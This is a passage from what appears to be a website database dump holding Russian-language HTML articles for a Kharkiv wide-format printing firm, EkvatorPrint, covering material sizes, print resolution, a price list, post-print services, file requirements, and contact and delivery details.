style=\"text-align: justify;\"><strong>Печать баннера</strong>: длина рулона 50 или 100 м, ширина: 1,37 м; 1,6 м; 2,5 м; 3,2 м; 5,2 м</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на самоклеющейся пленке</strong>: длина рулона 50 или 100 м, ширина: 1 м; 1,26 м; 1,4 м; 1,6 м</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на просветной бумаге \"Бэклит\"</strong>: длина рулона 300 м, ширина 1,27 м. (размер бумаги \"Бэклит\" обусловлен использованием для ситилайтов, размер которых 1,2х1,8)</p>\r\n<p style=\"text-align: justify;\"><strong>Печать на бумаге Блюбэк</strong>: длина рулона 300 м, ширина 1,6 м. Бумага Блюбек предназначена для оклейки бигбордов с размероами 3х6м. Бигборды данной бумагой оклеиваются со стыковкой материла.</p>\r\n<p style=\"text-align: justify;\">Отметим, что печать точно по размеру рулона практически не возможна из-за прижимных роликов принтера, фиксирующих материал по краям. Размеры валиков колеблются от 30 до 70 мм.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<table style=\"width: 700px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<h3 style=\"text-align: center;\"><strong><strong>Широкоформатная печать – разрешение</strong></strong></h3>\r\n<h5><strong>Обозначение разрешения</strong></h5>\r\n<p><img src=\"images/stories/dpi.jpg\" border=\"0\" width=\"150\" style=\"margin-left: 5px; margin-right: 5px; float: left; border: 0pt none;\" />Разрешение широкоформатной печати обозначается в DPI (звучит как ди-пи-ай) сокращенно от англ. dots per inch. DPI – это количество точек на линейный дюйм, или, более понятно, количество микрокапелек краски на один дюйм материала (1 дюйм = 2,54 см).<br /> <br /> Так, к примеру, обозначение 720*1440 dpi значит, что на 1 дюйм приходится 720 точек по горизонтали и 1440 точек по вертикали.<br /> <br /> DPI основной параметр влияющий на качество печати. И чем больше точек, тем качественнее и четче изображение, тем реалистичнее и ярче выглядит картинка.</p>\r\n<p>&nbsp;</p>\r\n<h5><strong>Размер капли головки принтера</strong></h5>\r\n<p><img src=\"images/stories/kaplja.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"125\" style=\"margin: 5px; float: left; border: 1px solid grey;\" />Размер капли головки принтера, еще один немаловажный фактор который определяет качество широкоформатной печати. Измеряется размер капли в <strong>пкл</strong> – пикалитрах. Чем больше размер капли головки принтера, тем более \"зернистое\" изображение.</p>\r\n<p>Какой размер капли головки использовать в печати, определяют по назначению печатного материала.</p>\r\n<p>Широкоформатная печать уличной графики предполагает применение разрешения печати 180, 360, 520 dpi с размером капли 32-54 пкл.</p>\r\n<p><strong>Широкоформатная печать</strong> интерьерной графики интерьерной графики предполагает разрешение печати 720-1080 dpi с размером капли 17-32 пкл.</p>\r\n<p><strong>Широкоформатная печать</strong> в фото качестве выполняется с разрешением 1440 dpi и размером капли от 7 до17 пкл.</p>\r\n<p>В \"ЭкваторПринт\" <a href=\"/\" title=\"широкоформатная печать Харьков\"><strong>широкоформатная печать</strong></a> выполняется согласно данных зависимости разрешения, размера капли и назначения печатаемого материала. <a href=\"printing-on-vinyl\">Самоклейка</a>, <a href=\"printing-on-canvas\">холсты</a> и <a href=\"print-citylights\">бумага ситик</a> печатаются в качестве 1440dpi. <a href=\"banner-printing\">Баннера</a> печатаются в качестве 1440dpi и 1080dpi.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2010-11-06 15:56:02',62,'','2016-04-27 11:08:26',62,62,'2019-04-23 11:31:09','2010-11-06 15:56:02','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',34,30,'широкоформатная печать харьков, цифровая печать харьков, цветная печать харьков, пленка печать харьков, печать на холсте харьков, баннер печать харьков, оборудование широкоформатная печать','Широкоформатная печать на высококачественном оборудовании. Широкоформатная печать пленка, баннер, на холсте. Цифровая цветная печать ',1,18529,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2,36,'Прайс','2010-11-06-15-56-43','<p>&nbsp;</p>\r\n<table style=\"width: 751px; height: 621px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"text-align: center; width: 710px; height: 24px; background-color: #172983; font-size: 160%; color: yellow;\" colspan=\"3\"><strong>ЦЕНЫ НА ШИРОКОФОРМАТНУЮ ПЕЧАТЬ</strong></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"width: 443px; background-color: #f5f5f5;\" rowspan=\"2\"><strong><span style=\"font-size: 140%;\">Материал</span> </strong></td>\r\n			<td style=\"width: 147px; background-color: #f5f5f5; font-size: 100%;\" rowspan=\"2\"><strong>Ширины рулонов (cм)</strong></td>\r\n			<td style=\"width: 120px; background-color: #f5f5f5;\">\r\n				<p style=\"text-align: center; font-size: 140%;\"><strong> Стоимость </strong><br /> <span style=\"text-align: center;\"><strong> (грн/м<sup>2</sup></strong>)</span></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"width: 60px; background-color: #f5f5f5; text-align: center; font-size: 120%;\"><strong>*от 5м<sup>2</sup></strong></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; width: 443px; background-color: #ffffff;\" align=\"left\"><span style=\"font-size: 150%;\">Самоклеющаяся пленка FOTO <em>JET</em></span><span style=\"font-size: 80%;\">1440dpi</span></td>\r\n			<td style=\"width: 147px; background-color: #ffffff;\"><span style=\"font-size: 10pt; text-align: center;\">104 / 124&nbsp;</span></td>\r\n			<td style=\"width: 60px; background-color: #ffffff;\"><span style=\"font-size: 160%;\">78</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"padding-left: 10px; width: 443px; background-color: #ffffff;\">\r\n				<p><span style=\"font-size: 150%;\">Самокл пленка перфорированная </span><span style=\"font-size: 100%;\">OneWayVision</span></p>\r\n			</td>\r\n			<td style=\"text-align: center; width: 147px; background-color: #ffffff;\"><span style=\"color: #000000; font-size: 10pt;\">104 / 124 / 148</span></td>\r\n			<td style=\"text-align: center; width: 60px; background-color: #ffffff;\"><span style=\"font-size: 160%;\">98</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"height: 20px; width: 710px; background-color: #f5f5f5;\" colspan=\"3\">&nbsp;</td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; text-align: left; width: 443px;\"><span style=\"font-size: 150%;\">Баннерная ткань ламинированная</span> <span style=\"font-size: 100%;\">прочная</span></td>\r\n			<td style=\"width: 147px;\"><span style=\"color: #000000; font-size: 10pt;\">310 / 205 / 155 / 105</span></td>\r\n			<td style=\"width: 60px;\"><span style=\"font-size: 160%;\">68</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"padding-left: 10px; width: 443px;\"><span style=\"font-size: 150%;\">Баннерная ткань литая</span> <span style=\"font-size: 65%;\">500г/м2</span></td>\r\n			<td style=\"text-align: center; width: 147px;\"><span style=\"color: #000000; font-size: 10pt;\">310 / 205 / 155 <br /></span></td>\r\n			<td style=\"text-align: center; width: 60px;\"><span style=\"font-size: 160%;\">92</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"padding-left: 10px; width: 443px;\"><span style=\"font-size: 150%;\">Баннерная ткань литая</span> <span style=\"font-size: 65%;\">500г/м2</span></td>\r\n			<td style=\"text-align: center; width: 147px;\"><span style=\"color: #000000; font-size: 10pt;\">105<br /></span></td>\r\n			<td style=\"text-align: center; width: 60px;\"><span style=\"font-size: 160%;\">78</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; text-align: left; width: 443px;\"><span style=\"font-size: 150%;\">Сетка баннерная</span></td>\r\n			<td style=\"width: 147px;\"><span style=\"color: #000000; font-size: 10pt;\">310</span></td>\r\n			<td style=\"width: 60px;\"><span style=\"font-size: 160%;\">95</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"height: 17px; width: 710px; background-color: #f5f5f5;\" colspan=\"3\"><span style=\"color: #000000; font-size: 10pt;\"> <br /></span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; text-align: left; width: 443px;\">\r\n				<p style=\"text-align: left;\"><span style=\"font-size: 150%;\">Бумага Ситик (Backlit)</span></p>\r\n			</td>\r\n			<td style=\"text-align: center; width: 147px;\"><span style=\"color: #000000; font-size: 10pt;\">120</span></td>\r\n			<td style=\"text-align: center; width: 60px;\"><span style=\"font-size: 160%;\">71</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; text-align: left; width: 443px;\"><span style=\"font-size: 150%;\">Бумага Блюбэк (Blueback)</span></td>\r\n			<td style=\"width: 147px;\"><span style=\"font-size: 10pt;\">120</span></td>\r\n			<td style=\"width: 60px;\"><span style=\"font-size: 160%;\">33</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left; height: 17px; width: 710px; background-color: #f5f5f5;\" colspan=\"3\">&nbsp;</td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; text-align: left; width: 443px;\"><span style=\"font-size: 150%;\">Холст художественный</span></td>\r\n			<td style=\"width: 147px;\"><span style=\"color: #000000; font-size: 10pt;\"><span style=\"text-align: left;\"><span style=\"text-align: left;\"><span style=\"line-height: 17px;\">104 /124 / 148</span></span>\r\n				</span>\r\n				</span>\r\n			</td>\r\n			<td style=\"width: 60px;\"><span style=\"font-size: 160%;\">290</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"width: 710px; background-color: #f5f5f5;\" colspan=\"3\">&nbsp;</td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"padding-left: 10px; text-align: left; width: 443px;\"><span style=\"font-size: 150%;\">Бумага для скроллов (polyman)</span></td>\r\n			<td style=\"width: 147px;\"><span style=\"font-size: 10pt; color: #000000; font-family: verdana, geneva;\">314</span></td>\r\n			<td style=\"width: 120px;\"><span style=\"font-size: 160%;\">115</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: left; width: 710px; background-color: #f5f5f5;\" colspan=\"3\">&nbsp;</td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"width: 720px;\" colspan=\"4\">\r\n				<p><span style=\"font-size: 90%;\"><strong>*при заказе <span style=\"text-decoration: underline;\">до</span> 5м2 учитывается вертикальный перерасход 0,25м2</strong>\r\n					</span>\r\n				</p>\r\n				<p>пример: печатная площадь баннера 105х400см будет 4,45м2</p>\r\n			</td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<table style=\"width: 753px; height: 451px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"text-align: center; background-color: #172983; height: 24px;\" colspan=\"4\"><span style=\"color: #ffec00; font-size: 150%;\"><strong>ПОСТПЕЧАТНЫЕ УСЛУГИ</strong> </span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center; color: #000000;\">\r\n			<td height=\"24\"><span style=\"font-size: 110%;\"><strong>№</strong></span></td>\r\n			<td><span style=\"font-size: 110%;\"><strong>Наименование</strong></span></td>\r\n			<td><span style=\"font-size: 110%;\"><strong>Единицы</strong></span></td>\r\n			<td><span style=\"font-size: 110%;\"><strong>Стоимость</strong></span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: 100%;\"><strong>1</strong></span></td>\r\n			<td style=\"text-align: left;\"><span style=\"font-size: 150%;\">Установка люверсов <span style=\"font-size: 60%;\">(оцинкованых)</span></span>\r\n			</td>\r\n			<td><span style=\"font-size: 100%;\"> грн./шт.</span></td>\r\n			<td><span style=\"font-size: 160%;\">2</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: center;\" height=\"24\"><strong style=\"font-size: 100%; text-align: center;\">2</strong></td>\r\n			<td style=\"text-align: left;\"><span style=\"font-size: 150%;\">Обрезка изображения по контуру</span></td>\r\n			<td><span style=\"font-size: 100%; text-align: center;\">грн./1м.пог.</span></td>\r\n			<td><span style=\"font-size: 160%; text-align: center;\">2</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: 100%; text-align: center;\"><strong>3</strong></span></td>\r\n			<td style=\"text-align: left;\"><span style=\"font-size: 150%;\">Подворот баннера + проклейка подворота</span></td>\r\n			<td><span style=\"font-size: 100%; text-align: center;\">грн./1м.пог.</span></td>\r\n			<td><span style=\"font-size: 160%; text-align: center;\">12</span></td>\r\n		</tr>\r\n		<tr style=\"text-align: center;\">\r\n			<td style=\"text-align: center;\" height=\"24\"><strong style=\"text-align: center; font-size: 100%;\">4</strong></td>\r\n			<td style=\"text-align: left;\"><span style=\"font-size: 150%;\">Плоттерная порезка пленки</span></td>\r\n			<td><span style=\"font-size: 100%; text-align: center;\">грн./м.кв.</span></td>\r\n			<td><span style=\"text-align: center;\"><span style=\"font-size: 90%;\">от </span><span style=\"font-size: 160%;\"> 54</span></span>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\" height=\"24\"><span style=\"font-size: 100%;\"><strong>5</strong> </span></td>\r\n			<td><span style=\"font-size: 150%;\">Сварка баннерной ткани</span></td>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 100%;\"> грн/1п.м</span></td>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 160%;\">30</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\" height=\"17\"><strong style=\"font-size: 100%;\"> 6</strong></td>\r\n			<td style=\"text-align: left;\"><span style=\"font-size: 150%;\">Корректировка макета</span></td>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 100%;\">грн./шт.</span></td>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 90%;\">от</span> <span style=\"font-size: 160%;\">30</span></td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"5\" style=\"width: 754px; height: 118px;\">\r\n	<tbody>\r\n		<tr>\r\n			<td style=\"text-align: center; background-color: #172983; height: 24px;\" colspan=\"4\"><span style=\"color: #ffec00; font-size: 150%;\"><strong>СТОИМОСТЬ ДОПОЛНИТЕЛЬНОЙ УПАКОВКИ</strong></span></td>\r\n		</tr>\r\n		<tr>\r\n			<td height=\"17\" style=\"text-align: center; font-size: 110%;\"><strong>Материал</strong></td>\r\n			<td height=\"17\" style=\"text-align: center; font-size: 110%;\"><strong>Вид упаковки</strong></td>\r\n			<td height=\"17\" style=\"text-align: center; font-size: 110%;\"><strong>Единицы</strong></td>\r\n			<td height=\"17\" style=\"text-align: center; font-size: 110%;\"><strong>Стоимость</strong></td>\r\n		</tr>\r\n		<tr>\r\n			<td height=\"17\" style=\"text-align: center;\"><span style=\"font-size: 150%;\">Рулонный</span></td>\r\n			<td height=\"17\" style=\"text-align: center;\"><span style=\"font-size: 150%;\">Картон</span></td>\r\n			<td height=\"17\" style=\"text-align: center;\">грн./1м.пог.</td>\r\n			<td height=\"17\" style=\"text-align: center;\"><span style=\"font-size: 160%;\">22</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 150%;\">Нерулонный</span></td>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 150%;\">Картон</span></td>\r\n			<td style=\"text-align: center;\">грн./м.кв+грн./шт</td>\r\n			<td style=\"text-align: center;\"><span style=\"font-size: 160%;\">155</span></td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p style=\"text-align: left;\">&nbsp;</p>\r\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"5\" style=\"width: 753px; height: 451px;\">\r\n	<tbody>\r\n		<tr>\r\n			<td colspan=\"7\" style=\"background-color: #172983; text-align: center; height: 24px;\"><span style=\"color: #ffec00; font-size: 150%;\"><strong>ТРЕБОВАНИЯ К МАКЕТАМ</strong> </span></td>\r\n		</tr>\r\n		<tr>\r\n			<td height=\"17\" style=\"text-align: center;\"><strong>1</strong></td>\r\n			<td colspan=\"6\"><span style=\"line-height: normal;\"><span style=\"font-size: 130%;\">Файлы принимаются в формате JPEG</span></span>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td height=\"17\" style=\"text-align: center;\"><strong>2</strong></td>\r\n			<td colspan=\"6\"><span style=\"line-height: normal; font-size: 130%;\">Макет должен быть в реальном размере (1:1)</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><strong>3</strong></td>\r\n			<td colspan=\"6\"><span style=\"font-size: 130%;\">Разрешение в макете для печати интерьерной рекламы должно быть до 150 пикс./дюйм, для наружной рекламы - до 70 пикс./дюйм.</span></td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><strong>4</strong></td>\r\n			<td colspan=\"6\">\r\n				<p><span style=\"font-size: 130%;\">Названия файлов должны подписываться в следующем порядке: кол-во штук, материал, размер, дополнительные услуги.</span></p>\r\n				<p style=\"font-size: 130%;\">К примеру: <em>2шт_пленкаFotoJet_60x60см_обрезка по периметру,</em> или<em> 3шт_баннер литой_100х150см_подворот_люверсы 30см по периметру.</em></p>\r\n			</td>\r\n		</tr>\r\n		<tr>\r\n			<td style=\"text-align: center;\"><strong>5</strong></td>\r\n			<td colspan=\"6\"><span style=\"font-size: 130%;\">Большое количество файлов рекомендуется высылать одним письмом в одном архиве.</span></td>\r\n		</tr>\r\n	</tbody>\r\n</table>\r\n<p style=\"text-align: center;\">Стоимость <a href=\"/\">широкоформатной печати</a> в прайс листе ЭкваторПринт характеризуется весьма демократичными ценами и гибкой политикой скидок. Так, цена печати будет выгодно меньше при больших объемах заказа.</p>\r\n<p style=\"text-align: center; color: #004eff; font-size: 180%;\">Мы предлагаем отличную цену и стабильно высокое качество</p>\r\n<p style=\"text-align: center;\">на печать <a href=\"banner-printing\">баннерных тканей</a>, <a href=\"printing-on-vinyl\">самоклеющихся пленок</a> и <a href=\"printing-on-canvas\">холстов</a>.</p>\r\n<hr />\r\n<p style=\"text-align: center; color: #004eff;\">при любых вопросах <span style=\"font-size: 180%;\"> пишите на e-mail</span> <span style=\"font-size: 140%;\">- мы всегда Вам подскажем и объясним.</span></p>\r\n<p style=\"text-align: center; font-size: 120%;\">Доставляем широкоформатную печать по всей Украине, условия доставки можно посмотреть в разделе <span style=\"font-size: 140%;\">Доставка</span></p>\r\n<p style=\"text-align: left;\">- <strong>Харьков&nbsp;</strong>- <strong>Киев&nbsp;</strong>- <strong>Днепр&nbsp;</strong>- <strong>Запорожье&nbsp;</strong>- <strong>Одесса</strong></p>','',1,8,'2010-11-06 15:56:31',62,'','2022-01-25 11:51:21',62,62,'2022-01-25 11:51:21','2010-11-06 15:56:31','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',635,29,'широкоформатная печать цена (прайс)','Самые Низкие Цены на  широкоформатную печать. Дешево и Качественно. Актуальный прайс на сайте. Доставка с Харькова по всей Украине.',1,171183,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(3,37,'Контакты','2010-11-06-15-56-56','<div style=\"margin: 10px;\">&nbsp;\r\n	<p style=\"font-size: 130%;\">Широкоформатная печать в \"ЭкваторПринт\" по адресу:</p>\r\n	<p style=\"font-size: 130%;\"><strong>ул. Военная 24</strong>, Харьков, Украина</p>\r\n	<p><img src=\"images/stories/telefon-1.jpg\" alt=\"\" width=\"30\" height=\"30\" border=\"0\" style=\"border-width: 0pt; border-style: none; color: #333333; vertical-align: middle;\" />&nbsp;&nbsp;<strong>Моб.</strong>: +38 099 407 92 92</p>\r\n	<p style=\"font-size: 200%;\"><img src=\"images/stories/pochta.jpg\" alt=\"\" width=\"30\" border=\"0\" style=\"color: #333333; vertical-align: middle;\" />&nbsp;<strong>e-mail: </strong><a href=\"mailto:e@ekvatorprint.com.ua\">e@ekvatorprint.com.ua</a><br /> <span style=\"font-size: 63%; text-align: justify;\">Для оформления заказа или консультаций по заказу, пожалуйста напишите нам на электронную почту, мы ответим в максимально короткие сроки.</span></p>\r\n	<p style=\"font-size: 120%;\">Заказ можно забрать с нашего офиса, или заказать доставку.</p>\r\n	<a href=\"mailto:e@ekvatorprint.com.ua\"></a>\r\n	<div style=\"background-color: #faf9f9;\">\r\n		<p style=\"text-align: center;\"><span style=\"font-size: 140%; color: #ff0000;\"><strong>Осуществляем быструю доставку по всей Украине</strong></span></p>\r\n		<p><img style=\"float: left; margin: 10px;\" title=\"широкоформатная печать - доставка\" src=\"images/stories/dostavka.jpg\" alt=\"широкоформатная печать - доставка по Украине\" width=\"150\" height=\"auto\" border=\"0\" /> <span style=\"font-size: 170%; text-align: center;\">Доставка по Украине</span><br /><span style=\"font-size: 130%;\"> осуществляется курьерской службой</span><br /><img style=\"float: center;\" src=\"images/stories/newpost.png\" alt=\"\" width=\"180\" height=\"auto\" /></p>\r\n		<p style=\"text-align: center; font-size: 120%;\">Средняя <span style=\"background-color: #ffff00;\">стоимость доставки по Украине составляет 60грн.</span> <br /><span style=\"font-size: 80%;\">(если посылка весом до 30кг. и длиной до 120см, стоимость доставки крупногабаритных посылок можно узнать на сайте Новой Почты)</span></p>\r\n	</div>\r\n	<p>{loadposition karta}</p>\r\n	<p><br /><img title=\"широкоформатная печать Харьков\" src=\"images/stories/kraski.jpg\" alt=\"широкоформатная печать Харьков\" width=\"50\" border=\"0\" style=\"border-width: 0pt; border-style: none; margin: 1px; vertical-align: middle;\" />В ЭВАТОРпринт можно заказать:</p>\r\n	<p><a href=\"banner-printing\">-печать на баннерноя ткани</a> - срочная печать баннеров для наружной рекламы<br /> <a href=\"printing-on-vinyl\">-печать на пленке</a> - печать на самоклеющейся пленке в фотокачестве<br /> -<a href=\"printing-on-the-grid\">печать на сетке</a>&nbsp;баннерной&nbsp;- производство рекламы сверхбольшого формата<br />-&nbsp;<a href=\"printing-on-canvas\">производство картин</a>&nbsp;- картины на подрамнике по лучшим ценам</p>\r\n	<p>&nbsp;</p>\r\n</div>','',1,8,'2010-11-06 15:56:45',62,'','2021-10-06 15:03:56',62,62,'2022-01-26 11:42:27','2010-11-06 15:56:45','0000-00-00 00:00:00','','','{\"article_layout\":\"\",\"show_title\":\"0\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',184,28,'печать на смольной, Экватор Принт контакты','Контактны компании ЭкваторПринт. Официальный сайт.',1,149270,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(4,38,'Главная','2010-11-06-16-27-54','<h1 style=\"text-align: center;\">Широкоформатная печать</h1>\r\n<table class=\"tbl_main_page\" style=\"height: 195px; width: 404px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"height: 20px;\">\r\n<td style=\"background-color: #99ccff; margin: 50px;\">&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td style=\"background-color: #99ccff; width: 100px;\">&nbsp;</td>\r\n<td style=\"background-color: #99ccff;\">&nbsp;</td>\r\n</tr>\r\n<tr valign=\"top\">\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"печать на холсте\" href=\"printing-on-canvas\"><img src=\"images/stories/xolst.jpg\" alt=\"интерьерная фотопечать на холсте\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"печать на виниле\" href=\"printing-on-vinyl\"><img src=\"images/stories/vinil-s.jpg\" alt=\"печать на пленке\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"баннер печать\" href=\"banner-printing\"><img src=\"images/stories/banner-s.jpg\" alt=\"широкоформатная печать на баннере\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"печать на сетке баннерной\" href=\"printing-on-the-grid\"><img src=\"images/stories/setka-s.jpg\" alt=\"широкоформатная печать на сетке\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td>&nbsp;</td>\r\n<td>\r\n<p style=\"text-align: center;\"><a title=\"печать бигбордов\" href=\"print-billboards\"><img title=\"печать билбордов\" src=\"images/stories/pechat-bigbordov.jpg\" alt=\"печать билбордов бигбордов\" width=\"92\" height=\"120\" /></a></p>\r\n</td>\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a title=\"изготовление наружной рекламы\" href=\"outdoor-advertising\"><img src=\"images/stories/narugnaja-kreativ-reklama-s.jpg\" alt=\"широкоформатная печать наружной рекламы\" /></a></p>\r\n</td>\r\n</tr>\r\n<tr style=\"background-color: #99ccff;\">\r\n<td style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><span style=\"text-decoration: underline;\"><a title=\"печать на холсте\" href=\"printing-on-canvas\">Печать на холсте</a></span></span></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a title=\"печать на виниле\" href=\"printing-on-vinyl\">Печать на виниле, самоклейке</a></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a title=\"баннер печать\" href=\"banner-printing\">Баннер печать</a></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a title=\"печать на сетке баннерной\" href=\"printing-on-the-grid\">Печать на сетке баннерной</a></td>\r\n<td style=\"background-color: #ffffff;\">&nbsp;</td>\r\n<td style=\"text-align: center;\"><a title=\"печать билбордов бигбордов\" href=\"print-billboards\">Печать билбордов</a></td>\r\n<td style=\"text-align: center;\"><a title=\"изготовление наружной рекламы\" href=\"index.php?option=com_content&amp;view=article&amp;id=11&amp;Itemid=12\">Изготовление наружной рекламы</a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"tbl_main_page\" style=\"height: 201px; width: 618px;\" border=\"0\" align=\"center\">\r\n<tbody>\r\n<tr style=\"height: 10px;\">\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr valign=\"top\">\r\n<td style=\"width: 100px;\">\r\n<p style=\"text-align: center;\"><a href=\"print-great-photos\"><img title=\"печать больших фотографий\" src=\"images/stories/photo.jpg\" alt=\"печать больших фотографий\" width=\"92\" height=\"120\" border=\"0\" 